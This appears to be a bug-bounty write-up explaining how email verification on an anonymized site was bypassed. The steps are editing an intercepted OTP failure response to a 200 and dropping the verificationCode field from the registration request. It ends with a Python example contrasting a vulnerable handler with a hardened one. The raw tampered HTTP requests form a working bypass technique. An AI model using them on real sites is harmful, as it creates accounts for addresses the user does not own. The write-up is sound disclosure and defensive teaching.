
How I was Able To Bypass Email Verification

Case Study

As this was a private program, all illustrations of vulnerabilities will be represented with the host as example.com.

The application had a registration page where a user could register a new email ID and password, which allowed them to log in to the application via the login page.

Registration process

Enter email ID and password.

Enter the OTP that is sent to your email for verification.

After successful OTP verification, choose 3 questions and answer those 3 questions (for security purposes).

Done.

Bypass (PoC)

Enter email ID and password.

Now you will be redirected to the OTP page, where you have to enter the OTP.

Enter a random number, e.g. 111111, and hit Enter. Intercept the request in Burp Proxy and click Do intercept -> Response to this request.

HTTP response

HTTP/1.1 422 Unprocessable Entity
Content-Type: application/json;charset=UTF-8
Content-Length: 67
Server:
X-Application-content: application:docker:8080
response-Key:
Expires: 0
Date: Tue, 31 Mar 2020 10:19:01 GMT
Connection: close
server-Timing:

{"errorcode":"error.user.1024","description":"Failed verfication"}

Modify it to

HTTP/1.1 200
Content-Type: application/json;charset=UTF-8
Content-Length: 67
Server:
X-Application-content: application:docker:8080
response-Key:
Expires: 0
Date: Tue, 31 Mar 2020 10:19:01 GMT
Connection: close
server-Timing:

I was then redirected to the page where I had to choose 3 questions and answer them for security purposes. I filled in all the details and intercepted the request.

HTTP request

POST /api/register HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Referer:
Content-Type: multipart/form-data; boundary=——————————————–349285293845798324589347594738925
content-Length: 606
Connection:close
Cookie:

——————————————-349285293845798324589347594738925

Content-Disposition: form-data; name="data"

{"inviteCode":null,"firstName":null,"lastname":null,"login":"testemail@gmail.com","email":"testemail@email.com","verificationCode":"111111","password":"qwerty@123","userPreference":{"locale":"en","timezone":"Asia/kolkata"},"securityQuestion":[{"displayOrder":0,"questionID":31,"answer":"test123"},{"displayOrder":1,"questionID":32,"answer":"qwerty"},{"displayOrder":1,"questionID":33,"answer":"wisdom"}],"programCode":"PMI"}

——————————————-349285293845798324589347594738925

If you look at the form-data, there is a parameter named verificationCode. To bypass, I removed the parameter.

Modified HTTP request

POST /api/register HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Referer:
Content-Type: multipart/form-data; boundary=——————————————–349285293845798324589347594738925
content-Length: 606
Connection:close
Cookie:

——————————————-349285293845798324589347594738925

Content-Disposition: form-data; name="data"

{"inviteCode":null,"firstName":null,"lastname":null,"login":"testemail@gmail.com","email":"testemail@email.com","password":"qwerty@123","userPreference":{"locale":"en","timezone":"Asia/kolkata"},"securityQuestion":[{"displayOrder":0,"questionID":31,"answer":"test123"},{"displayOrder":1,"questionID":33,"answer":"qwerty"},{"displayOrder":1,"questionID":33,"answer":"wisdom"}],"programCode":"PMI"}

——————————————-349285293845798324589347594738925

Done. Email verified.

Reported: 31 March 2020
Duplicate
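The server-side root cause and its fix, as an added example that is not code from the application or from the original post. It assumes the /api/register handler only compared verificationCode when the field was present; the function names, the in-memory OTP store and the sample values are hypothetical and constructed for illustration.

```python
import hmac
import time

MAX_ATTEMPTS = 5  # assumed per-address limit on OTP guesses


def new_store(now=None):
    """Constructed sample state: the OTP the server issued for a pending address."""
    now = time.time() if now is None else now
    return {"testemail@email.com": {"code": "482913", "expires": now + 600, "attempts": 0}}


def register_vulnerable(store, data):
    """Assumed flaw: the code is only compared when the client sends one."""
    code = data.get("verificationCode")
    pending = store.get(data.get("email"))
    if code is not None and (pending is None or code != pending["code"]):
        return 422
    return 200  # a request without verificationCode reaches account creation


def register_hardened(store, data, now=None):
    """Verification is decided from server-side state; a missing code is a failure."""
    now = time.time() if now is None else now
    email = data.get("email")
    code = data.get("verificationCode")
    pending = store.get(email) if isinstance(email, str) else None
    if pending is None or not isinstance(code, str):
        return 422  # unknown address, or absent / null / non-string code
    if now > pending["expires"] or pending["attempts"] >= MAX_ATTEMPTS:
        return 422  # expired code or too many guesses
    pending["attempts"] += 1
    if not hmac.compare_digest(code.encode(), pending["code"].encode()):
        return 422
    del store[email]  # single use: the code cannot be replayed
    return 200


if __name__ == "__main__":
    body = {"login": "testemail@gmail.com", "email": "testemail@email.com",
            "password": "constructed-password"}
    print("vulnerable, no code:", register_vulnerable(new_store(), body))
    print("hardened, no code:  ", register_hardened(new_store(), body))
    print("hardened, wrong code:", register_hardened(new_store(), {**body, "verificationCode": "111111"}))
    print("hardened, right code:", register_hardened(new_store(), {**body, "verificationCode": "482913"}))
```

The 422-to-200 response edit only changes what the browser shows next, so the hardened handler never relies on the client having passed the OTP page.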
